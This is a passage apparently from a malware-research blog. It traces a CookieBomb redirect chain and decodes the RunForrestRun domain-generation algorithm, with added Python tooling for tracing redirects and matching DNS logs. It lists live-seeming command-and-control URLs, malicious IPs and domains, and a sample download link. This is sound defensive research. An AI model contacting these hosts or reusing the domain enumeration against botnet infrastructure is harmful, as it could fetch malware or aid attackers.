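"""Hop-by-hop redirect tracer (added example, not the blog's own tool). It mirrors
the curl session above: fixed Referer and Cookie, no automatic redirect following,
every hop recorded, and a hop cap so the nesting ww9.ww9.ww9... cannot loop forever."""
import http.client
from urllib.parse import urljoin, urlsplit

HEADERS = {  # the User-Agent, Referer and Cookie from the curl session in the post
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
    "Referer": "greetz.from.malwaremustdie.org",
    "Cookie": "visited_uq=55",
}

def http_fetch(url, headers):
    """One GET without following redirects; returns (status, Location or None)."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=10)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    conn.request("GET", path, headers=dict(headers, Host=parts.netloc))
    resp = conn.getresponse()
    location = resp.getheader("Location")
    conn.close()
    return resp.status, location

def trace_redirects(start_url, fetch=http_fetch, max_hops=10):
    """Return [(url, status, next_url)] per hop; stop at the first non-3xx or max_hops."""
    hops, url = [], start_url
    for _ in range(max_hops):
        status, location = fetch(url, HEADERS)
        next_url = urljoin(url, location) if location else None
        hops.append((url, status, next_url))
        if not (300 <= status < 400 and next_url):
            break
        url = next_url
    return hops

def nested_self_redirects(hops):
    """Count hops whose target host is a subdomain of the host that issued them."""
    count = 0
    for url, _, next_url in hops:
        if next_url and urlsplit(next_url).hostname.endswith("." + urlsplit(url).hostname):
            count += 1
    return count

# Constructed offline replay of the chain shown in the post (h00p written as http).
REPLAY = {
    "http://jolyzgus.nl/count21.php": (302, "http://ww9.jolyzgus.nl"),
    "http://ww9.jolyzgus.nl": (302, "http://ww9.ww9.jolyzgus.nl"),
    "http://ww9.ww9.jolyzgus.nl": (302, "http://ww9.ww9.ww9.jolyzgus.nl"),
    "http://ww9.ww9.ww9.jolyzgus.nl": (302, "http://ww6.ww9.ww9.ww9.jolyzgus.nl"),
    "http://ww6.ww9.ww9.ww9.jolyzgus.nl": (200, None),  # the parked-domain page
}

def replay_fetch(url, headers):
    """Offline stand-in for http_fetch that answers from REPLAY."""
    return REPLAY[url.rstrip("/")]
```

`trace_redirects(url)` runs against a live chain with the default fetcher; `trace_redirects(url, fetch=replay_fetch)` replays the captured hops offline, and `nested_self_redirects()` counts how many hops bounced to a subdomain of themselves.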
Below are the payloads from attempts to fetch malware files from, and calls to, 62.116.143.18; the VT report for each payload is self-explanatory, please see the behaviour analysis tab (if available):
https://www.virustotal.com/en/file/19545f41f732280631e1b67302cdd8ab0d0e446a49c2022d6588f170ca9cbfb5/analysis/
https://www.virustotal.com/en/file/7c4a07f4c4fd3f9643cb1cf3d4aa7851ad790cf506efb150c0accc1fc85c2222/analysis/
https://www.virustotal.com/en/file/7fc85db12578612d73b5c670c4addec2d20f0154775addd43fab19450b8cd46a/analysis/
https://www.virustotal.com/en/file/8cab9d5987d5f72338981423043b9118d6eb20b146ea5f1f8000f25b50d2e46e/analysis/
https://www.virustotal.com/en/file/4280a7be51e34088d34eacd628af58b459672ac45b85b18113f8ed1f8bd19898/analysis/
https://www.virustotal.com/en/file/b7657dfc20e077929c89afb6d9c47dc16d1ef3a0404d7a5168d318651c223add/analysis/
https://www.virustotal.com/en/file/39d69b0a16a16c7cbb6b0118f1b5999f75c425918b66c9293509dc822593d383/analysis/
Additionally, the VirusTotal report for 62.116.143.18 is here-->>[VirusTotal]

Just in case: the domain jolyzgus.nl is actually SUSPENDED and PARKED as per the details below, so is it still infecting us? This is a real mystery for all of us to check..

$ nslookup jolyzgus.nl

jolyzgus.nl
origin = ns.parktons.com
mail addr = root.gransy.com
serial = 2013010310
refresh = 1800
retry = 10800
expire = 604800
minimum = 1800
jolyzgus.nl nameserver = ns.parktons.com.
jolyzgus.nl nameserver = ns2.parktons.com.
jolyzgus.nl internet address = 31.170.179.179


$ whois jolyzgus.nl|less

Domain name: jolyzgus.nl
Status: active

Registrar:
1API Gmbh
Talstrasse 27
66424 Homburg
Deutschland
Germany

Registrant DemieGoudswaard
Administrative contact admin@jolyzgus.nl
Technical contact(s) admin@jolyzgus.nl

Domain nameservers:
ns1.1apidomainondispute.net
ns2.1apidomainondispute.net
ns3.1apidomainondispute.net
DNSSEC: no

Date registered 2013-08-28
Date of last change 2013-09-02
Record maintained by NL Domain Registry
Feel free to comment! :-)

Additional / Final Conclusion:

As initially suspected, after deeper investigation, the CookieBomb malware domain jolyzgus.nl is gone and the domain was parked under 31.170.179.179 (parktons.com), which has an auto-forwarder to the affiliate domain parking service at 62.116.143.18 (parkingcrew.com).

We still have the question of HOW a parked domain's IP can still serve malware samples as reported; this investigation is still open and the result will be added accordingly.

#MalwareMustDie!

RunForrestRun DGA (is alive!!) at 91.233.244.102 (Old Evil Code Come Back With New Obfuscation Trick)

I was mentioned by our friend for the detected RunForrestRun DGA obfuscation code as per the tweet below (Thanks for the notification, Bart!):

Yes, I fetched it and took a look:

--2013-11-02 17:06:54--  h00p://portail-val-de-loir.com/
Resolving portail-val-de-loir.com... seconds 0.00, 85.10.130.29
Caching portail-val-de-loir.com => 85.10.130.29
Connecting to portail-val-de-loir.com|85.10.130.29|:80... seconds 0.00, connected.
:
GET / HTTP/1.0
Referer: remember.us.malwaremustdie.org
Host: portail-val-de-loir.com
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sat, 02 Nov 2013 08:06:30 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 12 Jul 2012 01:52:59 GMT
ETag: "18f21da-32bd2b-4c498391b34c0"
Accept-Ranges: bytes
Content-Length: 3325227
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 3325227 (3.2M) [text/html]
Saving to: `index.html'
100%[============================>] 3,325,227 103K/s in 39s
2013-11-02 17:07:35 (83.0 KB/s) - `index.html' saved [3325227/3325227]
This is a real worst case of code injection: the index HTML was injected more than 50 times with the obfuscated JavaScript code; the sample is here with password=infected -->>[MMD Mediafire]. The obfuscation method used is improved, as per the marked parts below, by trying to mimic the script used by Google Analytics:

The first decoding process can be viewed here -->>[MMD Pastebin]
And the result is the well-known DGA code below:

which is exactly the same code as in our case posted on July 23, 2013 here-->>[MMD PREV.POST]

So, we have seen RunForrestRun for almost one year and the logic hasn't changed a bit. Just in case someone meets a similar case or code in the future, I made a simple script for you to use if you see one, as per the snipped GOOD code and "howto" below:

// manual crack...@unixfreaxjp
// erase the whole setTimeout(function () ... block, we don't need that mess..
// and replace it with the code below...
// (make sure you include the rest of the functions, generatePseudoRandomString() in particular..)
// The code :

var nextday = new Date();
nextday.setFullYear(2013);
for (var yyy = 0; yyy < 12; yyy++) {          // months are 0..11; setMonth(12) would roll into 2014
  nextday.setMonth(yyy, 1);                    // reset to day 1 so a 31st never rolls into the next month
  for (var xxx = 1; xxx <= 31; xxx++) {
    nextday.setDate(xxx);
    if (nextday.getMonth() != yyy) break;      // day past the end of this month rolled over, stop here
    var unix = Math.round(nextday.getTime() / 1000);   // the seed is the unix time of that date
    var domainName = generatePseudoRandomString(unix, 16, 'ru');
    document.write(xxx + " | " + domainName + " | " + nextday + "\n");
  }
}
Using the script above you can extract the domains per date, as snipped below:
1 | oxkjnvhjnvnegtyb.ru | Tue Oct 01 2013 17:36:40 GMT+0900
2 | bloxgsfzinxmdspt.ru | Wed Oct 02 2013 17:36:40 GMT+0900
3 | mxpgggggukxqteoy.ru | Thu Oct 03 2013 17:36:40 GMT+0900
4 | yjsovtnpgbwqcbbd.ru | Fri Oct 04 2013 17:36:40 GMT+0900
5 | lwtcxuzbdrsnpqfb.ru | Sat Oct 05 2013 17:36:40 GMT+0900
6 | xiwlnutkxsqxwjge.ru | Sun Oct 06 2013 17:36:40 GMT+0900
7 | kwyyhhqtwxupnhyu.ru | Mon Oct 07 2013 17:36:40 GMT+0900
8 | wicjgufeimlbmcus.ru | Tue Oct 08 2013 17:36:40 GMT+0900
9 | ivewawjppavmkhwx.ru | Wed Oct 09 2013 17:36:40 GMT+0900
10 | uihgxtcniyolbobp.ru | Thu Oct 10 2013 17:36:40 GMT+0900
11 | hvitmnanuzbabudp.ru | Fri Oct 11 2013 17:36:40 GMT+0900
12 | thldkvcgbkzcbfxw.ru | Sat Oct 12 2013 17:36:40 GMT+0900
13 | gunqeyhnrhskxjdr.ru | Sun Oct 13 2013 17:36:40 GMT+0900
14 | shqyztdrsofsjnib.ru | Mon Oct 14 2013 17:36:40 GMT+0900
15 | eusngyfurlziprua.ru | Tue Oct 15 2013 17:36:40 GMT+0900
((snipped))
with the complete list of 709 days extracted here --->>[MMD PASTEBIN]
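The per-date enumeration, as an added example in Python (not the blog's script): the actual generatePseudoRandomString() lives in the decoded DGA code linked above and is not reproduced here, so demo_generator is a constructed stand-in with the same (seed, length, tld) arguments. What the block shows is the seeding of exactly one timestamp per calendar day and the defender's follow-up, matching observed DNS queries against the resulting list.

```python
"""Date-window enumeration for a date-seeded DGA plus a DNS-log check (added example,
not the blog's tool). The real generatePseudoRandomString() from the decoded script is
not reproduced; demo_generator is a constructed stand-in with the same argument shape."""
import hashlib
from datetime import datetime, timedelta, timezone

def demo_generator(seed, length, tld):
    """Constructed stand-in: deterministic letters derived from a sha256 of the seed."""
    digest = hashlib.sha256(str(seed).encode()).digest()
    label = "".join(chr(ord("a") + b % 26) for b in digest[:length])
    return label + "." + tld

def enumerate_dga(generator, start, days, length=16, tld="ru"):
    """One (ISO date, domain) per calendar day. Seeds are UTC-midnight unix
    timestamps, so there is no month/day rollover like setMonth(12) or setDate(32)."""
    table = []
    for i in range(days):
        day = (start + timedelta(days=i)).replace(tzinfo=timezone.utc)
        seed = int(day.timestamp())
        table.append((day.date().isoformat(), generator(seed, length, tld)))
    return table

def match_dns_log(lines, table):
    """Return [(date, domain, line)] for every log line that queries a generated domain."""
    lookup = {domain: date for date, domain in table}
    hits = []
    for line in lines:
        for token in line.split():
            token = token.strip("().,;").lower()
            if token in lookup:
                hits.append((lookup[token], token, line))
    return hits

# Constructed data: a one-week window and two DNS log lines, the second of which
# queries the generated domain for the second day of the window.
TABLE = enumerate_dga(demo_generator, datetime(2013, 11, 6), 7)
SAMPLE_LOG = [
    "Nov 07 10:02:11 client 10.0.0.5#51234: query: www.example.com IN A +",
    "Nov 07 10:02:15 client 10.0.0.5#51235: query: " + TABLE[1][1] + " IN A +",
]

def demo():
    """Hits from SAMPLE_LOG against TABLE; expected exactly one, dated 2013-11-07."""
    return match_dns_log(SAMPLE_LOG, TABLE)
```

Swap demo_generator for the real generator function once you have decoded it, and widen `days` to cover the period you want to block or sinkhole.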

And using our tools here--->>[MMD Google Code], following the DGA procedure wiki here-->>[MMD Wiki], I found that the domains below are activated NOW (format: domain, IP, DNS, and DATE):

yalkzsvudybexfgd.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Apr 16 
lomxtgmgrswlgrrn.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Apr 17
wzbdwenwshfzglwt.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 17
jnfrqmekhoevppvw.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 18
vygzhvfiuommkqfj.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 19
imjosxuhbcdonrco.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Aug 20
bhigmqckbqhleqlo.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Nov 06
nsjosicxuhpidhlp.ru, 91.233.244.102, dns1.webdrive.ru.,dns2.webdrive.ru. | Nov 07
I also found that the domains below are blocked/sinkholed:
gatrxzmokglyvnqh.ru, 195.22.26.253, 195.22.26.254, ns1.csof.net. ns2.csof.net.
smvydqivtigcadxb.ru, 195.22.26.253, 195.22.26.254, ns1.csof.net. ns2.csof.net.
I can say the reputation of IP 91.233.244.102 is not good:
VirusTotal history (with thanks!) -->>[HERE]
URLQuery records (many thanks) -->>[URLQuery]

Sometimes the bad guys have unique ways to greet us! :-))

Below are the bad URLs that can be switched alive:

h00p://yalkzsvudybexfgd.ru/runforestrun?sid=botnet2
h00p://lomxtgmgrswlgrrn.ru/runforestrun?sid=botnet2
h00p://wzbdwenwshfzglwt.ru/runforestrun?sid=botnet2
h00p://jnfrqmekhoevppvw.ru/runforestrun?sid=botnet2
h00p://vygzhvfiuommkqfj.ru/runforestrun?sid=botnet2
h00p://imjosxuhbcdonrco.ru/runforestrun?sid=botnet2
h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2
h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Just in case, I recorded them all in URLQuery (Thanks guys!):
http://urlquery.net/report.php?id=7388672
http://urlquery.net/report.php?id=7388677
http://urlquery.net/report.php?id=7388681
http://urlquery.net/report.php?id=7388683
http://urlquery.net/report.php?id=7388687
http://urlquery.net/report.php?id=7388692
http://urlquery.net/report.php?id=7388694
http://urlquery.net/report.php?id=7388701
Those detected domains are all activated via REGGI.RU of the Russian Federation:
domain: YALKZSVUDYBEXFGD.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.11.02 13:21:36 MSK

domain: LOMXTGMGRSWLGRRN.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.11.02 13:21:36 MSK

domain: WZBDWENWSHFZGLWT.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.16
paid-till: 2014.08.16
free-date: 2014.09.16
source: TCI
Last updated on 2013.11.02 13:21:36 MSK

domain: JNFRQMEKHOEVPPVW.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.16
paid-till: 2014.08.16
free-date: 2014.09.16
source: TCI
Last updated on 2013.11.02 13:26:32 MSK

domain: VYGZHVFIUOMMKQFJ.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.16
paid-till: 2014.08.16
free-date: 2014.09.16
source: TCI
Last updated on 2013.11.02 13:26:32 MSK

domain: IMJOSXUHBCDONRCO.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.16
paid-till: 2014.08.16
free-date: 2014.09.16
source: TCI
Last updated on 2013.11.02 13:26:32 MSK

domain: BHIGMQCKBQHLEQLO.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.06
paid-till: 2013.11.06
free-date: 2013.12.07
source: TCI
Last updated on 2013.11.02 13:31:37 MSK

domain: NSJOSICXUHPIDHLP.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.06
paid-till: 2013.11.06
free-date: 2013.12.07
source: TCI
Last updated on 2013.11.02 13:31:37 MSK
And the IP information also points to a St. Petersburg IDC:
$ whois 91.233.244.102

% Information related to '91.233.244.0 - 91.233.245.255'

inetnum: 91.233.244.0 - 91.233.245.255
netname: OLBORG-NET
descr: Olborg Ltd
descr: St.Petersburg
country: RU
admin-c: OLCR1-RIPE
tech-c: OLCR1-RIPE
status: ASSIGNED PI
mnt-by: OLBORG-MNT
mnt-by: RIPE-NCC-END-MNT
mnt-routes: OLBORG-MNT
mnt-domains: OLBORG-MNT
source: RIPE # Filtered

role: Olborg Ltd - Contact Role
address: Olborg Ltd
address: St.Petersburg, Russia
abuse-mailbox: abuse@o1host.net
remarks: *************************************************
remarks: * For spam/abuse/security issues please contact *
remarks: * abuse@o1host.net , not this address *
remarks: *************************************************
org: ORG-OL89-RIPE
admin-c: AK8017-RIPE
tech-c: AK8017-RIPE
nic-hdl: OLCR1-RIPE
mnt-by: OLBORG-MNT
source: RIPE # Filtered

% Information related to '91.233.244.0/23AS57636'

route: 91.233.244.0/23
descr: Olborg Ltd.
origin: AS57636
mnt-by: OLBORG-MNT
source: RIPE # Filtered
I really hope to see all domains from this logic blocked.. otherwise they will surely come back again with much better obfuscation.

#MalwareMustDie!!
